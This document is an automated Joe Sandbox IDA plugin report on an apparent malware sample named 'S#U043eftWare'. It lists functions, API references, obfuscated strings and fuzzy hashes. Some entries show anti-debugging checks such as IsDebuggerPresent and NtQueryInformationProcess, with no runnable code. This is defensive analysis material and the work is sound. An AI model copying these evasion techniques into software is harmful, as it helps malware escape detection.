Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: Handle$File$Close$Module$Create$CurrentMappingProcessProtectViewVirtual$InformationName
String ID: "k$$'Ddg$@$Hc$$Hc$$g[8'$g[8'$SS$SS
API String ID: 2758125660-1003079120
Opcode ID: 9958d8e95a9ddba8f5139d3717b753fe5158cf3ecca60028d1eb6846bf42ff21
Instruction ID: 393d85d2ca02f0be93e7a0c36a298993569d0572451f82fb9cf79a5d07349bc0
Opcode Fuzzy Hash: 9958d8e95a9ddba8f5139d3717b753fe5158cf3ecca60028d1eb6846bf42ff21
Instruction Fuzzy Hash: 2143F176B442118FCB08CF3CCAD53D97BF6AF46314F109259D859EBBA5C73A89498B02

Function 6CDC6BD0 Relevance: 19.1, APIs: 3, Strings: 7, Instructions: 1630COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?), ref: 6CDC7356
GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?), ref: 6CDC811D

Strings

es.Y, xrefs: 6CDC7230
es.Y, xrefs: 6CDC72A3
ntdll.dll, xrefs: 6CDC734A, 6CDC8111
zO+f, xrefs: 6CDC7619
Pq, xrefs: 6CDC7785
NtQueryInformationProcess, xrefs: 6CDC735E, 6CDC8125
zO+f, xrefs: 6CDC817C

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: HandleModule
String ID: NtQueryInformationProcess$Pq$es.Y$es.Y$ntdll.dll$zO+f$zO+f
API String ID: 4139908857-2659222355
Opcode ID: beb40e29cde4a0f0d5191bdac464ba89c5e22fa78e53449d5be29a1eaaac20f5
Instruction ID: 23e57ea037a4e31b346f7155422776c6304104193441f9fdd0c3df3bcaf9d5df
Opcode Fuzzy Hash: beb40e29cde4a0f0d5191bdac464ba89c5e22fa78e53449d5be29a1eaaac20f5
Instruction Fuzzy Hash: 98C22576B506018FDF04CF7CCA957DE7BF6EB46324F20952AD415C7BA5C22A990B8B02

Function 6CDD14E8 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6CDD152F
___scrt_uninitialize_crt.LIBCMT ref: 6CDD1549

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: a28104bef8e5bdaa4bb2da47ff5f7daabc75e48ed01f918be4143be3e981f53c
Instruction ID: d96413ed922cb8e624d1359c30d9d5fa6e42e4ec75738bea79977beea6e8c250
Opcode Fuzzy Hash: a28104bef8e5bdaa4bb2da47ff5f7daabc75e48ed01f918be4143be3e981f53c
Instruction Fuzzy Hash: 3B41D572E04214EFDB108FA5C800BAE7BB5EB85B78F174219F81557A70C735E9058BB0

Function 6CDD1598 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6CDD15D5
dllmain_crt_dispatch.LIBCMT ref: 6CDD15EC
dllmain_raw.LIBCMT ref: 6CDD1634
dllmain_crt_dispatch.LIBCMT ref: 6CDD1647
dllmain_raw.LIBCMT ref: 6CDD165A

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 5054044b36e81d6bc587166a2c60daf04c48c58fdc9e56b5a537a0cf7f2429ed
Instruction ID: b431541eb6a1128684e2387e58ff444799fb9bf6890892ccfa4563a77c6bface
Opcode Fuzzy Hash: 5054044b36e81d6bc587166a2c60daf04c48c58fdc9e56b5a537a0cf7f2429ed
Instruction Fuzzy Hash: 78214F71E01659EBDB214F55C840AAF3A79EB81BB8F1B4229F81557A70C335ED058BE0

Function 6CDD6A72 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6CDD6AA0
_free.LIBCMT ref: 6CDD6AC6

Strings

Hl, xrefs: 6CDD6ADF

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: _free
String ID: Hl
API String ID: 269201875-1007200271
Opcode ID: 980a3e9c64ce7fbb7847b6ee4f016225fe348e72d9cc32c19cdbcd0a90db473b
Instruction ID: b9cb16e11d076b13a429d357fdac3899bb6426db9d4cbbaaa5ce731877db0e4d
Opcode Fuzzy Hash: 980a3e9c64ce7fbb7847b6ee4f016225fe348e72d9cc32c19cdbcd0a90db473b
Instruction Fuzzy Hash: 171193B1F402209BDF209F2D9D41B4937B4A746724F1A1A16E965CBEE0EB7CE84647D0

Function 6CDD13E1 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6CDD142E

Part of subcall function 6CDD18AB: InitializeSListHead.KERNEL32(6CE2F388,6CDD1438,6CDE10D8,00000010,6CDD13C9,?,?,?,6CDD15F1,?,00000001,?,?,00000001,?,6CDE1120), ref: 6CDD18B0

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CDD1498

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 440ea18e7d999af0752cde1d34e5a38517d27f08ad868e0ce78ac14e7fd0e546
Instruction ID: 442d96ae4fb9894ca096215c2ace771fbb8caba2f6d3b00b0a397c4ab161ad0e
Opcode Fuzzy Hash: 440ea18e7d999af0752cde1d34e5a38517d27f08ad868e0ce78ac14e7fd0e546
Instruction Fuzzy Hash: 6321CD32E492109AEB00ABB488047D977B1EF4627EF12051AE49227AF2CB35B04CC3B1

Function 6CDD620F Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6CDD625B
GetFileType.KERNELBASE(00000000), ref: 6CDD626D

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 5f6588d32b2d399cf07b824049deccc9162b4947a64e0cee8ce16954e31d9f8d
Instruction ID: bffdcb5306efddcb773060538d9d427f116f4c22f59d3e029617af5063a1d310
Opcode Fuzzy Hash: 5f6588d32b2d399cf07b824049deccc9162b4947a64e0cee8ce16954e31d9f8d
Instruction Fuzzy Hash: 96118E71A047518ADB204F3E888479BBEA4AB97238B360F1AD5B7D69F1D724F44387C1

Function 6CDD47D6 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CDD43D9,00000001,00000364,00000013,000000FF,?,00000001,6CDD47C8,6CDD4859,?,?,6CDD3A6F), ref: 6CDD4817

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 81d668161ccff7dbcbdb486b28db13431ee8274dae77ae3c47dbfbad3280c771
Instruction ID: c61699574688debf34143e367e57422d42bbee7c5248e0f0fba81013ea2b5819
Opcode Fuzzy Hash: 81d668161ccff7dbcbdb486b28db13431ee8274dae77ae3c47dbfbad3280c771
Instruction Fuzzy Hash: 5EF0B432E452A4B7EB111B769C44F9BB758DF427F4B174221E814DAAA4CB30F44487E0

Non-executed Functions

Function 6CDC4810 Relevance: 18.8, Strings: 13, Instructions: 2508COMMON

Download Yara Rule

Strings

i/C7, xrefs: 6CDC5AE6
C'=, xrefs: 6CDC6416
=#t, xrefs: 6CDC5719
=#t, xrefs: 6CDC578D
iWa|, xrefs: 6CDC54C5
\Lf, xrefs: 6CDC5B54
\Lf, xrefs: 6CDC5AE1
C'=, xrefs: 6CDC63C8
`/J, xrefs: 6CDC58CA
H2B, xrefs: 6CDC6B71
H2B, xrefs: 6CDC6314
:W, xrefs: 6CDC67EB
:W, xrefs: 6CDC679D

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID: :W$:W$=#t$=#t$C'=$C'=$H2B$H2B$\Lf$\Lf$`/J$i/C7$iWa|
API String ID: 0-3696831155
Opcode ID: f31a3b6468ee572e9b3afab34ed6163d3f1f40f668211612bc3ae624c4f756a8
Instruction ID: 5c1238d09aa07a0232a556a0b6e0366bf932d86834dc61517bc4c3cc4c78a149
Opcode Fuzzy Hash: f31a3b6468ee572e9b3afab34ed6163d3f1f40f668211612bc3ae624c4f756a8
Instruction Fuzzy Hash: 45130F72B44215CFDF048F6CC8D17ED7BF6BB46314F208619D855DBBA4CA3A890A9B12

Function 0054AC10 Relevance: 15.5, Strings: 12, Instructions: 484
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

C, xrefs: 0054ACFB
"S#M, xrefs: 0054AEC2
q]j], xrefs: 0054AF4D
;OnI, xrefs: 0054AECA
!_2Y, xrefs: 0054AEAA
T#]], xrefs: 0054AEA2
tw, xrefs: 0054AEFA
9]j], xrefs: 0054AF10
I'Y!, xrefs: 0054AE9A
tW(Q, xrefs: 0054AEBA
\, xrefs: 0054AD06
x[, xrefs: 0054AEB2

Memory Dump Source

Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID: !_2Y$"S#M$9]j]$;OnI$C$I'Y!$T#]]$\$q]j]$tW(Q$tw$x[
API String ID: 0-621965088
Opcode ID: 6867a64c209b8ec419b575e2f86c161e36324c351d94c4c156dac538c8b104a7
Instruction ID: 0077388605917baf37841a36464fcb721e77fd7d82598e2c918f1312e32a8e91
Opcode Fuzzy Hash: 6867a64c209b8ec419b575e2f86c161e36324c351d94c4c156dac538c8b104a7
Instruction Fuzzy Hash: 6EF1FC72A083019BE310DF64CC95B9BBBE5FBC5718F148A2CF5959B290D374D905CB82

Function 0051B890 Relevance: 10.5, Strings: 8, Instructions: 491COMMON

Download Yara Rule

Strings

*1#), xrefs: 0051B9C5
9%;<, xrefs: 0051B9DD
?=!<, xrefs: 0051B9D5
8<*>, xrefs: 0051B9F5
6, xrefs: 0051BB05
hVkg, xrefs: 0051B890
N@FN, xrefs: 0051BA0D
Y]W], xrefs: 0051BA1D

Memory Dump Source

Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID: *1#)$6$8<*>$9%;<$?=!<$N@FN$Y]W]$hVkg
API String ID: 0-3617423471
Opcode ID: 83c991cffa6e60ea07d5c839a1e663d600b50350f74ad5ff60149fd351f06f3c
Instruction ID: 35a27d92b954acafabe62af6f28e07d6b83d883c88f0e45be9475647eadde731
Opcode Fuzzy Hash: 83c991cffa6e60ea07d5c839a1e663d600b50350f74ad5ff60149fd351f06f3c
Instruction Fuzzy Hash: 98D13D716087914BE729CF29C8503ABBFE1AFD7314F0885ADD4D59B392CB398846C792

Function 6CDD0660 Relevance: 9.7, Strings: 7, Instructions: 929COMMONLIBRARYCODE

Download Yara Rule

Strings

2SA, xrefs: 6CDD0B94
j94$, xrefs: 6CDD1280
/iwc, xrefs: 6CDD0D2C
/iwc, xrefs: 6CDD0D7A
n^?, xrefs: 6CDD0EC9
j94$, xrefs: 6CDD1366
2SA, xrefs: 6CDD0BCA

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID: /iwc$/iwc$j94$$j94$$2SA$2SA$n^?
API String ID: 0-1377534680
Opcode ID: a2c371cd3685d763fac5988789b61846975726d7486310896a927a6c553f7561
Instruction ID: 9d02c35161b53e0573dc97ffa175050092f17463031e9f07d028a501bca56a9a
Opcode Fuzzy Hash: a2c371cd3685d763fac5988789b61846975726d7486310896a927a6c553f7561
Instruction Fuzzy Hash: 6B620676E441058FCF048F7CD5D13DD7BF2EB86364F269219E4A1EBEA5C22EA4498B10

Function 6CDD1BCA Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CDD1BD6
IsDebuggerPresent.KERNEL32 ref: 6CDD1CA2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CDD1CC2
UnhandledExceptionFilter.KERNEL32(?), ref: 6CDD1CCC

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 91627b82bce9a2fdcefef35a720ae18fc97a5e921de0c6bea7d0580c99581b67
Instruction ID: 433519a28364ef885a66af903ac5fdcfceaac0342dba6469df991c191f86d3c2
Opcode Fuzzy Hash: 91627b82bce9a2fdcefef35a720ae18fc97a5e921de0c6bea7d0580c99581b67
Instruction Fuzzy Hash: 0B311875D05218DBDF10DFA4D9897CDBBB8FF08304F1041AAE509AB250EB71AA898F55

Function 6CDD455A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CDD4652
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CDD465C
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CDD4669

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 0f6fc79c7381ea12ef08018e8b0a670dd5f942a65a9cc1a052943920fd76f99f
Instruction ID: 6400ec2c0f5e7fa2259131ab383eac9063202ade6d97bec3bca25c72a44dabbd
Opcode Fuzzy Hash: 0f6fc79c7381ea12ef08018e8b0a670dd5f942a65a9cc1a052943920fd76f99f
Instruction Fuzzy Hash: 8631E775D012189BCB21DF64D9887CCBBB8FF48314F5142DAE51CA72A0E770AB858F54

Function 00531D30 Relevance: 4.5, Strings: 3, Instructions: 794COMMON

Download Yara Rule

Strings

`UZg, xrefs: 005323A2
SLZ/, xrefs: 00531F3B
22#8, xrefs: 005320DD

Memory Dump Source

Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID: 22#8$SLZ/$`UZg
API String ID: 0-4122401267
Opcode ID: 288ee2bce7103384c5a054534002528cfa115474a16b14fcab4be05cf5fd8009
Instruction ID: be960ea10d7f29b3adf66c8a5aa4a951c473e5ad5a8700c0a299bc7f95b96ee3
Opcode Fuzzy Hash: 288ee2bce7103384c5a054534002528cfa115474a16b14fcab4be05cf5fd8009
Instruction Fuzzy Hash: 5652F370504B418FD735CF39C490666BFE2BF59314F188A6DD4EA8BB92D735A80ACB50

Function 6CDD3358 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6CDD3357,?,00000001,?,?), ref: 6CDD337A
TerminateProcess.KERNEL32(00000000,?,6CDD3357,?,00000001,?,?), ref: 6CDD3381
ExitProcess.KERNEL32 ref: 6CDD3393

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 7c9a5c7170214c351651859c50ff003d2e9281227f864c773970b969155d700f
Instruction ID: d7ea4e2ac2cb19b54bf6b8cf3b7cc6a619e7f1aa95100bc311965ee9fe10e39a
Opcode Fuzzy Hash: 7c9a5c7170214c351651859c50ff003d2e9281227f864c773970b969155d700f
Instruction Fuzzy Hash: D5E0B631A11148EBDF116B94CA48EA87B7AEB81245F124519FA0586A30CB35F996DB90

Function 0051BDE0 Relevance: 4.2, Strings: 3, Instructions: 407COMMON

Download Yara Rule

Strings

hVkg, xrefs: 0051BEA3, 0051BEAE, 0051BF0E, 0051BF8A, 0051C07F, 0051C0EC
,#, xrefs: 0051C1A6
XY, xrefs: 0051C245

Memory Dump Source

Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID: ,#$XY$hVkg
API String ID: 0-3157124528
Opcode ID: d8e07519e3664dec0322d4856f058b50cc952020e8b5f40ddabfe29399a635cf
Instruction ID: 65fde0d2715ff3e8e0db5466c81262052983b95b883f6d18e060753da176a39f
Opcode Fuzzy Hash: d8e07519e3664dec0322d4856f058b50cc952020e8b5f40ddabfe29399a635cf
Instruction Fuzzy Hash: 4DD101755483808BE714CF25C8957ABBFE2FBD5314F188A2CE4D58B292D739C94ACB42

Function 0051B540 Relevance: 4.1, Strings: 3, Instructions: 312COMMON

Download Yara Rule

Strings

", xrefs: 0051B560
x, xrefs: 0051B678
hVkg, xrefs: 0051B540

Memory Dump Source

Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID: "$hVkg$x
API String ID: 0-3103696286
Opcode ID: 072cb71bf26747f87b983939a6e1ada988f371099c2d1c705f68f80655460780
Instruction ID: 5831383f57242c750d63eb0118bd3430758a248c3de37cf535872329d5921361
Opcode Fuzzy Hash: 072cb71bf26747f87b983939a6e1ada988f371099c2d1c705f68f80655460780
Instruction Fuzzy Hash: 0691363520C3858AE705CF29C4907BAFFE1AFE3304F1846ADE4D597392DB69850AC752

Function 6CDC82A0 Relevance: 2.8, Strings: 2, Instructions: 306COMMON

Download Yara Rule

Strings

@., xrefs: 6CDC8695
@., xrefs: 6CDC8435

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID: @.$@.
API String ID: 0-2970659124
Opcode ID: 7bb7c14e127d734eafd498529f6adb92b06d0e4d8aaae540eba6094b06eae7a9
Instruction ID: 96a0d06bba3f05fb864476a4b3ab2da53d8e10661b8cdc824d60f122f91e3979
Opcode Fuzzy Hash: 7bb7c14e127d734eafd498529f6adb92b06d0e4d8aaae540eba6094b06eae7a9
Instruction Fuzzy Hash: F3B1A1B6F412098FCF04CFBCC981ADEB7F5AB5A364F108116E821E7794C2399905CB56

Function 0054D940 Relevance: 2.7, Strings: 2, Instructions: 218COMMON

Download Yara Rule

Strings

7654, xrefs: 0054D974
5|iL, xrefs: 0054DB50

Memory Dump Source

Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID: 5|iL$7654
API String ID: 0-3845795888
Opcode ID: 918c0c1a8a8ef6f7d4aa39418e29e6072ade66776cf4155e4daa52008b11cde1
Instruction ID: c31ac0460285437e8efa44f1c8978fb8cee63cb8383186fb4a16022d3bcb9888
Opcode Fuzzy Hash: 918c0c1a8a8ef6f7d4aa39418e29e6072ade66776cf4155e4daa52008b11cde1
Instruction Fuzzy Hash: 34512836F056115BD710CE29CC8029ABBE3FBC5728F1EC268E89897354DA74DC0687D2

Function 6CDDABE1 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CDDABDC,?,?,00000008,?,?,6CDDA874,00000000), ref: 6CDDAE0E

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

